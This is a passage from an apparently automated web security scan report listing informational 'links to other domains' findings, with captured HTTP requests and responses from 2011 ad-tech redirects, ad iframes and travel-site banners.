<A HREF="http://g-pixel.invitemedia.com/gmatcher?id=E1&amp;redirectURL=http%3A%2F%2Fad.yieldmanager.com%2Fpixel%3Fid%3D1423476%26id%3D1423478%26id%3D1423475%26id%3D1423477%26id%3D1423479%26t%3D2">here</A>
...[SNIP]...

19.110. http://cm.g.doubleclick.net/pixel

Summary

Severity:   Information
Confidence:   Certain
Host:   http://cm.g.doubleclick.net
Path:   /pixel

Issue detail

The page was loaded from a URL containing a query string. The response contains the following link to another domain:

Request

GET /pixel?nid=chango&partnerId=&referrerURL=&token=b6ae888c-d95b-11e0-b096-0025900e0834 HTTP/1.1
Host: cm.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://as.chango.com/links/adunit/1.31759988192e+12?adid=13713&adpos=0&agid=11720&atype=HISTORIC&bidder=bidder05-sj-west&bm=1.84336389243&cid=10449&da=10087&datc=san+jose&dc=namemedia&dom=guardian.co.uk&dsi=None&ebp=o2FsgIeco3h8bGWkdw&eid=Rubicon&ht=250&ibs=None&kf=202457&kw=Malware+freeware&kwid=5827704&mw=1.0&poo=p&sid=5cadceb4-ed52-11e0-ab71-00259035d426&st=broad&stid=guardian.co.uk&tkn=b6ae888c-d95b-11e0-b096-0025900e0834&ts=1317599881920&uf=0&uid=b6ae888c-d95b-11e0-b096-0025900e0834&url=http%3A%2F%2Fwww.guardian.co.uk%2Ffootball%2F2011%2Fsep%2F27%2Fmanchester-united-basel-live&wh=300&wp=869757B4845F780B&sig=d9ce9455d859589baae4652880c0ad93
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=OPT_OUT

Response

HTTP/1.1 302 Found
Location: http://gcm.chango.com/collector/relator?id=E1&partnerId=&referrerURL=&token=b6ae888c-d95b-11e0-b096-0025900e0834
Cache-Control: no-store, no-cache
Pragma: no-cache
Date: Sun, 02 Oct 2011 23:58:03 GMT
Content-Type: text/html; charset=UTF-8
Server: Cookie Matcher
Content-Length: 321
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN

<HTML><HEAD><meta http-equiv="content-type" content="text/html;charset=utf-8">
<TITLE>302 Moved</TITLE></HEAD><BODY>
<H1>302 Moved</H1>
The document has moved
<A HREF="http://gcm.chango.com/collector/relator?id=E1&amp;partnerId=&amp;referrerURL=&amp;token=b6ae888c-d95b-11e0-b096-0025900e0834">here</A>
...[SNIP]...

19.111. http://cm.g.doubleclick.net/pixel

Summary

Severity:   Information
Confidence:   Certain
Host:   http://cm.g.doubleclick.net
Path:   /pixel

Issue detail

The page was loaded from a URL containing a query string. The response contains the following link to another domain:

Request

GET /pixel?nid=invitemedia HTTP/1.1
Host: cm.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.goal.com/en/news/9/england/2011/10/01/2691360/anderson-confident-manchester-united-will-keep-unbeaten-run
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=OPT_OUT

Response

HTTP/1.1 302 Found
Location: http://g-pixel.invitemedia.com/gmatcher?id=E1
Cache-Control: no-store, no-cache
Pragma: no-cache
Date: Sun, 02 Oct 2011 23:59:06 GMT
Content-Type: text/html; charset=UTF-8
Server: Cookie Matcher
Content-Length: 242
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN

<HTML><HEAD><meta http-equiv="content-type" content="text/html;charset=utf-8">
<TITLE>302 Moved</TITLE></HEAD><BODY>
<H1>302 Moved</H1>
The document has moved
<A HREF="http://g-pixel.invitemedia.com/gmatcher?id=E1">here</A>
...[SNIP]...

19.112. http://cm.g.doubleclick.net/pixel

Summary

Severity:   Information
Confidence:   Certain
Host:   http://cm.g.doubleclick.net
Path:   /pixel

Issue detail

The page was loaded from a URL containing a query string. The response contains the following link to another domain:

Request

GET /pixel?nid=invitemedia HTTP/1.1
Host: cm.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://d.tradex.openx.com/afr.php?zoneid=6393&cb=INSERT_RANDOM_NUMBER_HERE
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=OPT_OUT

Response

HTTP/1.1 302 Found
Location: http://g-pixel.invitemedia.com/gmatcher?id=CAESEDEkmOR_JA2g3tPQAqL09Zs&cver=1
Cache-Control: no-store, no-cache
Pragma: no-cache
Date: Sun, 02 Oct 2011 23:59:53 GMT
Content-Type: text/html; charset=UTF-8
Server: Cookie Matcher
Content-Length: 278
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN

<HTML><HEAD><meta http-equiv="content-type" content="text/html;charset=utf-8">
<TITLE>302 Moved</TITLE></HEAD><BODY>
<H1>302 Moved</H1>
The document has moved
<A HREF="http://g-pixel.invitemedia.com/gmatcher?id=CAESEDEkmOR_JA2g3tPQAqL09Zs&amp;cver=1">here</A>
...[SNIP]...

19.113. http://cm.g.doubleclick.net/pixel

Summary

Severity:   Information
Confidence:   Certain
Host:   http://cm.g.doubleclick.net
Path:   /pixel

Issue detail

The page was loaded from a URL containing a query string. The response contains the following link to another domain:

Request

GET /pixel?nid=xplusone1&_r=1 HTTP/1.1
Host: cm.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://d.xp1.ru4.com/meta?_o=179638&_t=cmcont&ssv_ptnr=pm
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=OPT_OUT

Response

HTTP/1.1 302 Found
Location: http://m.xp1.ru4.com/um?_r=1&_o=62795&_i=52786&_u=E1&_r=1
Cache-Control: no-store, no-cache
Pragma: no-cache
Date: Mon, 03 Oct 2011 00:13:09 GMT
Content-Type: text/html; charset=UTF-8
Server: Cookie Matcher
Content-Length: 270
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN

<HTML><HEAD><meta http-equiv="content-type" content="text/html;charset=utf-8">
<TITLE>302 Moved</TITLE></HEAD><BODY>
<H1>302 Moved</H1>
The document has moved
<A HREF="http://m.xp1.ru4.com/um?_r=1&amp;_o=62795&amp;_i=52786&amp;_u=E1&amp;_r=1">here</A>
...[SNIP]...

19.114. http://cm.g.doubleclick.net/pixel

Summary

Severity:   Information
Confidence:   Certain
Host:   http://cm.g.doubleclick.net
Path:   /pixel

Issue detail

The page was loaded from a URL containing a query string. The response contains the following link to another domain:

Request

GET /pixel?nid=invitemedia&redirectURL=http%3A%2F%2Fad.yieldmanager.com%2Fpixel%3Fid%3D1423484%26id%3D1423481%26id%3D1423480%26id%3D1423483%26id%3D1423482%26t%3D2 HTTP/1.1
Host: cm.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://fls.doubleclick.net/activityi;src=3057879;type=searc451;cat=searc443;u1=US;u12=109368;u13=324884;u14=255157;u15=1643195;u16=04%2F10%2F11-07%2F10%2F11;u18=2;ord=53963720?
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=OPT_OUT

Response

HTTP/1.1 302 Found
Location: http://g-pixel.invitemedia.com/gmatcher?id=CAESEAxxFW9mtGU6p1AMb23X4HM&cver=1&redirectURL=http%3A%2F%2Fad.yieldmanager.com%2Fpixel%3Fid%3D1423484%26id%3D1423481%26id%3D1423480%26id%3D1423483%26id%3D1423482%26t%3D2
Cache-Control: no-store, no-cache
Pragma: no-cache
Date: Mon, 03 Oct 2011 00:10:44 GMT
Content-Type: text/html; charset=UTF-8
Server: Cookie Matcher
Content-Length: 418
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN

<HTML><HEAD><meta http-equiv="content-type" content="text/html;charset=utf-8">
<TITLE>302 Moved</TITLE></HEAD><BODY>
<H1>302 Moved</H1>
The document has moved
<A HREF="http://g-pixel.invitemedia.com/gmatcher?id=CAESEAxxFW9mtGU6p1AMb23X4HM&amp;cver=1&amp;redirectURL=http%3A%2F%2Fad.yieldmanager.com%2Fpixel%3Fid%3D1423484%26id%3D1423481%26id%3D1423480%26id%3D1423483%26id%3D1423482%26t%3D2">here</A>
...[SNIP]...

19.115. http://cms.ad.yieldmanager.net/v1/cms

Summary

Severity:   Information
Confidence:   Certain
Host:   http://cms.ad.yieldmanager.net
Path:   /v1/cms

Issue detail

The page was loaded from a URL containing a query string. The response contains the following link to another domain:

Request

GET /v1/cms?esig=1~862d802dd86fb59368388ad078a7f298ddbbd0b7&nwid=10000424978&sigv=1 HTTP/1.1
Host: cms.ad.yieldmanager.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://cdn.turn.com/server/ddc.htm?uid=2944787775510337379&mktid=&mpid=&fpid=5&rnd=2692888823581473023&nu=n&sp=y&ctid=1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: XO=y=1&t=269&v=3&yoo=1&XTS=1317129649&XSIG=0L.VWitFPbxt_lWYSM3ztrMCI9U-; BX=ei08qcd75vc4d&b=4&d=4auM3vprYH0wsQ--&s=ii&t=269

Response

HTTP/1.1 302 Found
Date: Sun, 02 Oct 2011 23:53:07 GMT
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Location: http://r.turn.com/r/cms/id/0/ddc/1/pid/43/uid/?xid=u02DzKG_.KFBo5S2yyqljPCE
Cache-Control: private
Connection: close
Content-Type: text/plain; charset=utf-8
Content-Length: 792

HTTP/1.1 302 Found
Date: Sun, 02 Oct 2011 23:53:07 GMT
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PU
...[SNIP]...
n.com/r/cms/id/0/ddc/1/pid/43/uid/?xid=u02DzKG_.KFBo5S2yyqljPCE
Cache-Control: private
Connection: close
Transfer-Encoding: chunked
Content-Type: text/html; charset=utf-8

The document has moved <A HREF="http://r.turn.com/r/cms/id/0/ddc/1/pid/43/uid/?xid=u02DzKG_.KFBo5S2yyqljPCE">here</A>
...[SNIP]...

19.116. http://d.tradex.openx.com/afr.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://d.tradex.openx.com
Path:   /afr.php

Issue detail

The page was loaded from a URL containing a query string. The response contains the following link to another domain:

Request

GET /afr.php?refresh=40&zoneid=6509&cb=INSERT_RANDOM_NUMBER_HERE HTTP/1.1
Host: d.tradex.openx.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OXRB=28_4196; __utma=20948333.858847159.1317599444.1317599444.1317599444.1; __utmb=20948333.6.6.1317599444; __utmc=20948333; __utmz=20948333.1317599444.1.1.utmcsr=goal.com|utmccn=(referral)|utmcmd=referral|utmcct=/en/teams/england/97/man-utd-news; __qca=P0-1745582797-1317599446738; __csref=http%3A%2F%2Fwww.goal.com%2Fen%2Fteams%2Fengland%2F97%2Fman-utd-news; OAID=6f699005174db05207a17138d8473dc0

Response

HTTP/1.1 200 OK
Date: Sun, 02 Oct 2011 23:59:19 GMT
Server: Apache
X-Powered-By: PHP/5.2.11
Pragma: no-cache
Cache-Control: private, max-age=0, no-cache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
P3P: CP="CUR ADM OUR NOR STA NID"
Set-Cookie: OAID=6f699005174db05207a17138d8473dc0; expires=Mon, 01-Oct-2012 23:59:19 GMT; path=/
Content-Length: 2698
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC '-//W3C//DTD XHTML 1.0 Transitional//EN' 'http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd'>
<html xmlns='http://www.w3.org/1999/xhtml' xml:lang='en' lang='en'>
<head>
<ti
...[SNIP]...
<!-- BEGIN STANDARD TAG - 160 x 600 - ROS: Run-of-site - DO NOT MODIFY -->
<IFRAME FRAMEBORDER=0 MARGINWIDTH=0 MARGINHEIGHT=0 SCROLLING=NO WIDTH=160 HEIGHT=600 SRC="http://ad.yieldmanager.com/st?ad_type=iframe&ad_size=160x600&section=2126909"></IFRAME>
...[SNIP]...

19.117. http://d.tradex.openx.com/afr.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://d.tradex.openx.com
Path:   /afr.php

Issue detail

The page was loaded from a URL containing a query string. The response contains the following link to another domain:

Request

GET /afr.php?refresh=40&zoneid=6510&cb=INSERT_RANDOM_NUMBER_HERE&loc= HTTP/1.1
Host: d.tradex.openx.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://d.tradex.openx.com/afr.php?refresh=40&zoneid=6510&cb=INSERT_RANDOM_NUMBER_HERE
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OXRB=28_4196; __utma=20948333.858847159.1317599444.1317599444.1317599444.1; __utmb=20948333.6.6.1317599444; __utmc=20948333; __utmz=20948333.1317599444.1.1.utmcsr=goal.com|utmccn=(referral)|utmcmd=referral|utmcct=/en/teams/england/97/man-utd-news; __qca=P0-1745582797-1317599446738; __csref=http%3A%2F%2Fwww.goal.com%2Fen%2Fteams%2Fengland%2F97%2Fman-utd-news; OAID=6f699005174db05207a17138d8473dc0

Response

HTTP/1.1 200 OK
Date: Sun, 02 Oct 2011 23:59:58 GMT
Server: Apache
X-Powered-By: PHP/5.2.11
Pragma: no-cache
Cache-Control: private, max-age=0, no-cache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
P3P: CP="CUR ADM OUR NOR STA NID"
Set-Cookie: OAID=6f699005174db05207a17138d8473dc0; expires=Mon, 01-Oct-2012 23:59:58 GMT; path=/
Content-Length: 3032
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC '-//W3C//DTD XHTML 1.0 Transitional//EN' 'http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd'>
<html xmlns='http://www.w3.org/1999/xhtml' xml:lang='en' lang='en'>
<head>
<ti
...[SNIP]...
<!-- BEGIN STANDARD TAG - 300 x 250 - ROS: Run-of-site - DO NOT MODIFY -->
<IFRAME FRAMEBORDER=0 MARGINWIDTH=0 MARGINHEIGHT=0 SCROLLING=NO WIDTH=300 HEIGHT=250 SRC="http://ad.yieldmanager.com/st?ad_type=iframe&ad_size=300x250&section=2126909"></IFRAME>
...[SNIP]...

19.118. http://d.tradex.openx.com/afr.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://d.tradex.openx.com
Path:   /afr.php

Issue detail

The page was loaded from a URL containing a query string. The response contains the following link to another domain:

Request

GET /afr.php?refresh=40&zoneid=6511&cb=INSERT_RANDOM_NUMBER_HERE HTTP/1.1
Host: d.tradex.openx.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OXRB=28_4196; OAID=6f699005174db05207a17138d8473dc0

Response

HTTP/1.1 200 OK
Date: Sun, 02 Oct 2011 23:52:12 GMT
Server: Apache
X-Powered-By: PHP/5.2.11
Pragma: no-cache
Cache-Control: private, max-age=0, no-cache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
P3P: CP="CUR ADM OUR NOR STA NID"
Set-Cookie: OAID=6f699005174db05207a17138d8473dc071952f762daf6c74f0896932; expires=Mon, 01-Oct-2012 23:52:12 GMT; path=/
Content-Length: 2691
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC '-//W3C//DTD XHTML 1.0 Transitional//EN' 'http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd'>
<html xmlns='http://www.w3.org/1999/xhtml' xml:lang='en' lang='en'>
<head>
<ti
...[SNIP]...
<!-- BEGIN STANDARD TAG - 728 x 90 - ROS: Run-of-site - DO NOT MODIFY -->
<IFRAME FRAMEBORDER=0 MARGINWIDTH=0 MARGINHEIGHT=0 SCROLLING=NO WIDTH=728 HEIGHT=90 SRC="http://ad.yieldmanager.com/st?ad_type=iframe&ad_size=728x90&section=2126909"></IFRAME>
...[SNIP]...

19.119. http://delivery.hotels.com/Hotels/Delivery.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://delivery.hotels.com
Path:   /Hotels/Delivery.aspx

Issue detail

The page was loaded from a URL containing a query string. The response contains the following link to another domain:

Request

GET /Hotels/Delivery.aspx?LAN=en_US&P=HOTELS_RESULTS&D=BOS&CI=10%2f04%2f2011&CO=10%2f07%2f2011&pr=1&pa0=2&CUR=USD&RID=F26233EF-31CE-4292-B85B-D59136E17861&HsrchId=8a1f660d-3224-44b2-81e5-6c5cf059520f&ads=3&HTID1=279478&HP1=289.00&HTID2=507871&HP2=385.67%7c308.53&HTID3=382704&HP3=432.33&HTID4=278318&HP4=425.67%7c383.10&HTID5=282295&HP5=429.00&HTID6=280489&HP6=409.40&HTID7=280555&HP7=412.33&HTID8=281066&HP8=401.33&HTID9=286928&HP9=399.00&HTID10=286520&HP10=379.95&HTID11=279419&HP11=349.00&HTID12=278651&HP12=345.67&HTID13=341115&HP13=399.00%7c359.10&HTID14=293264&HP14=414.00&HTID15=290317&HP15=399.00%7c339.15&HTID16=294968&HP16=419.00&HTID17=282971&HP17=127.99&HTID18=278530&HP18=359.00&HTID19=278584&HP19=445.67&HTID20=469918&HP20=445.67&HTID21=296221&HP21=399.00&HTID22=287041&HP22=436.33&HTID23=387950&HP23=392.33&HTID24=289629&HP24=221.10&HTID25=279089&HP25=263.33&HTID26=284205&HP26=335.67&HTID27=279064&HP27=295.67&HTID28=293346&HP28=309.00&HTID29=534622&HP29=875.00&HTID30=286858&HP30=439.00&HTID31=392615&HP31=124.99&HTID32=290613&HP32=143.99&HTID33=327172&HP33=103.00%7c72.10&HTID34=279428&HP34=149.22%7c141.76&HTID35=278489&HP35=223.74%7c178.99&HTID36=292088&HP36=126.66&HTID37=362369&HP37=229.95&HTID38=283739&HP38=106.66&HTID39=281930&HP39=159.00&HTID40=392054&HP40=129.99&HTID41=279446&HP41=439.00&HTID42=280626&HP42=179.00&HTID43=291348&HP43=129.99&HTID44=299565&HP44=175.67&HTID45=302276&HP45=549.00&HTID46=362518&HP46=230.00&HTID47=287689&HP47=124.99&HTID48=345803&HP48=106.66&HTID49=562856&HP49=103.00&HTID50=287601&HP50=99.99 HTTP/1.1
Host: delivery.hotels.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.hotels.com/search.do?searchParams.arrivalDate=10-04-11&pointName&searchParams.departureDate=10-07-11&lon=0.0&queryFormState=CLOSED&monthCheckOut=10&fromHotelDetails=false&destination=Boston%2C&showSimilarDestinations=true&fromLandmark=false&searchParams.rooms[0].numberOfAdults=2&asaReport&dayInMonthCheckIn=4&fromDisambiguation=false&destinationForLandmark&monthCheckIn=10&activeTab=DESTINATION&dayInMonthCheckOut=7&lat=0.0&rooms=1&ppc=1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SSID=BQBsXxscAAAAAAAp_YhOsO4QAin9iE4BAAAAAAAAAAAAKf2ITgCCAAABgwQAACn9iE4BAIcAAAG0BAAAKf2ITgEA; SSSC=3.G5659051284361178800.1|130.1155:135.1204; SSRT=Kf2ITgA; SESSID=44777099D2E37148A35E76005853DABC.hm21tc04; guid=e206d102-4853-4dd2-9d9b-23d14562d0f1; channel=DC; SSLB=1; SSPV=EMAAAAAAAAAAAAAAAAAAAAAAAAEAAAAAAAA; homepage_search_data="Qm9zdG9uLA..//10/04/11//10/07/11//2//MM/dd/yy//1643195"; user=RCoxMjQuMS4wLmkxJTNBOTcuNzMuMS5pMyUzQTk4LjYuNCUzQTEzNy4wLjAuaTIlM0ExNDUuMC4wLmkyJTNBMTA4LjEuMC5pMiUzQTE1Mi4wLjAuaTIlM0ExOTYuMS4wJTNBOTIuMC4wLmkxJTNBMTIxLjUwMy4wLmk3JTNBMTk1LjAuMCUzQTEwNC4wLjElN0NIQ09NX1VTIUEqZW5fVVN8SENPTV9VUw..

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: application/x-javascript; charset=utf-8
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: UID=1961757583|1|0; expires=Tue, 02-Oct-2012 00:10:12 GMT; path=/
Set-Cookie: hl_upm=Y4E7n03ene2ZDIPTWpLM1HtSrQx1OyDdsY4KBK1Ss8UP/OJVjMn5RXwMzdzUolZoFNbG0LY/3mcZcj1YGkhYg9cf+1x7zjDp93dVTciqsDvIIF2mmYFd1RbFocYxB9o//yaseYy3OsV0S8C79JNlCVbfn5N53QGPKIW9FCknA/oIYfb3tgn5TXtpCoHoL5Zu2ExEwcU/MA/DwgQacyCqbkHdE577MIjt2DKh7MxWUmkvXndCU208bGgFm4Qs6PiVmjW45gH5UX/uhZ4lXzi0tTLmv38iaf58; expires=Thu, 02-Oct-2014 00:10:12 GMT; path=/
X-Powered-By: ASP.NET
p3p: CP="ALL DSP COR CUR ADMo DEVo PSAo PSDo IVDi OUR STP PRE"
Date: Mon, 03 Oct 2011 00:10:12 GMT
Connection: close

var th_InsType1=0;var th_InsType2=0;var th_InsType3=0;var th_InsType4=0;var th_InsType5=0;var th_InsType6=0;var th_InsertStart=new Date();var th_instanceArray=new Array();var THSearch = 3861123723;var
...[SNIP]...
<div class="TH_IMG" style="float: left; padding:0px 6px; 0 10px"><img src="https://media.expedia.com/media/content/expuk/graphics/hcom/internal/vao_icon_sweet.png" /></div>
...[SNIP]...
<td style=\'padding: 0px 5px 0px 10px; vertical-align:middle;\'><img src="https://media.expedia.com/media/content/expuk/graphics/hcom/internal/vao_icon_sweet.png" style=\'padding-right:5px;\'></td>
...[SNIP]...

19.120. http://dm.travelocity.com/html.ng/site=travelocity&adsize=728x90&cobrand=TRAVELOCITY&area=homepage&Section=frontdoor&tile=60048504&random=-99147040413176

Summary

Severity:   Information
Confidence:   Certain
Host:   http://dm.travelocity.com
Path:   /html.ng/site=travelocity&adsize=728x90&cobrand=TRAVELOCITY&area=homepage&Section=frontdoor&tile=60048504&random=-99147040413176

Issue detail

The page was loaded from a URL containing a query string. The response contains the following link to another domain:

Request

GET /html.ng/site=travelocity&adsize=728x90&cobrand=TRAVELOCITY&area=homepage&Section=frontdoor&tile=60048504&random=-99147040413176? HTTP/1.1
Host: dm.travelocity.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.travelocity.com/472a
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TVLY_GEO=|||||; tyrg1st=51B82D43BB8E25C5; SID=T000V00000X401118380170533249023416102; NGUserID=a1c4b0d-32323-499133968-1317600484; mbox=check#true#1317600542|session#1317600481056-80236#1317602342|PC#1317600481056-80236.19#1318810083

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:08:13 GMT
Server: Apache
X-Server: prdlmn3110
AdServer: 10.28.75.14:9678:1
P3P: policyref="http://dm.travelocity.com/w3c/p3p.xml", CP="ALL DSP COR CUR ADM DEVo CONi OUR DEL IND PHY DEM ONL PRE INT PUR CNT UNI NAV COM"
Cache-Control: max-age=0, no-cache
Expires: Mon, 03 Oct 2011 00:08:13 GMT
Vary: Accept-Encoding,User-Agent
Pragma: no-cache
Content-Length: 884
Content-Type: text/html

<a href="http://dm.travelocity.com/event.ng/Type=click&FlightID=83479&AdID=152818&TargetID=8870&ASeg=&AMod=&AOpt=0&Segments=1,9,3090,5796,5878,9520,10495,11148,12670,20052,20299,20311,22041,22251,2230
...[SNIP]...
ect=http://leisure.travelocity.com/Promotions/0,,TRAVELOCITY|6266|pkg_main,00.html?locLink=GLB_HOMEPAGE|SUBNAV&WA1=03030&WA2=HP&WA3=728&WA4=110118_green_hotels_728x90gif&WA5=IM&WA7=5613" target="_top"><img src="http://i.travelpn.com.edgesuite.net/Sponsor_gifs/110118_green_hotels_728x90.gif" width="728" height="90" border="0" alt="Green Travel Deals"></a>

19.121. http://dm.travelocity.com/html.ng/site=travelocity&cobrand=TRAVELOCITY&adsize=300x250&area=homepage&tile=991496234131760&transactionID=703831317600485&random=914961581317600

Summary

Severity:   Information
Confidence:   Certain
Host:   http://dm.travelocity.com
Path:   /html.ng/site=travelocity&cobrand=TRAVELOCITY&adsize=300x250&area=homepage&tile=991496234131760&transactionID=703831317600485&random=914961581317600

Issue detail

The page was loaded from a URL containing a query string:
The response contains the following link to another domain:

Request

GET /html.ng/site=travelocity&cobrand=TRAVELOCITY&adsize=300x250&area=homepage&tile=991496234131760&transactionID=703831317600485&random=914961581317600? HTTP/1.1
Host: dm.travelocity.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.travelocity.com/472a
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TVLY_GEO=|||||; tyrg1st=51B82D43BB8E25C5; SID=T000V00000X401118380170533249023416102; NGUserID=a1c4b0d-32323-499133968-1317600484; mbox=check#true#1317600542|session#1317600481056-80236#1317602342|PC#1317600481056-80236.19#1318810083; __utma=97304794.100809678.1317600495.1317600495.1317600495.1; __utmb=97304794.1.10.1317600495; __utmc=97304794; __utmz=97304794.1317600495.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); IPE_S_TMP_910=910; mt.v=1.249362358.1317600494998

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:08:19 GMT
Server: Apache
X-Server: prdlmn0408
AdServer: 10.28.75.27:9678:1
P3P: policyref="http://dm.travelocity.com/w3c/p3p.xml", CP="ALL DSP COR CUR ADM DEVo CONi OUR DEL IND PHY DEM ONL PRE INT PUR CNT UNI NAV COM"
Cache-Control: max-age=0, no-cache
Expires: Mon, 03 Oct 2011 00:08:19 GMT
Vary: Accept-Encoding,User-Agent
Pragma: no-cache
Content-Length: 896
Content-Type: text/html

<a href="http://dm.travelocity.com/event.ng/Type=click&FlightID=125327&AdID=178801&TargetID=31769&ASeg=&AMod=&AOpt=0&Segments=1,9,3090,5714,5796,9520,10495,11148,12670,20052,20299,20311,22041,22251,22
...[SNIP]...
,2468,2537,4760,4772,6472,6474,6510,6974,8829,9080,9119,12194,12196,12728,12736,12804&RawValues=USERID%252Ca1c4b0d-32323-499133968-1317600484&Redirect=http://www.travelocity.com/Roam" target="_blank""><img src="http://i.travelpn.com.edgesuite.net/Sponsor_gifs/110902_roamgnome_300x250.jpg" alt="Travelocity Contest" width="300" height="250" border="0"><img src="http://travel.travelocity.com/___waseq.img?WA1=03031&WA2=ent&WA3=300&WA4=110902_roamgnome_300x250jpg&WA5=IM&WA7=16428" width="1" height="1" border="0">
...[SNIP]...

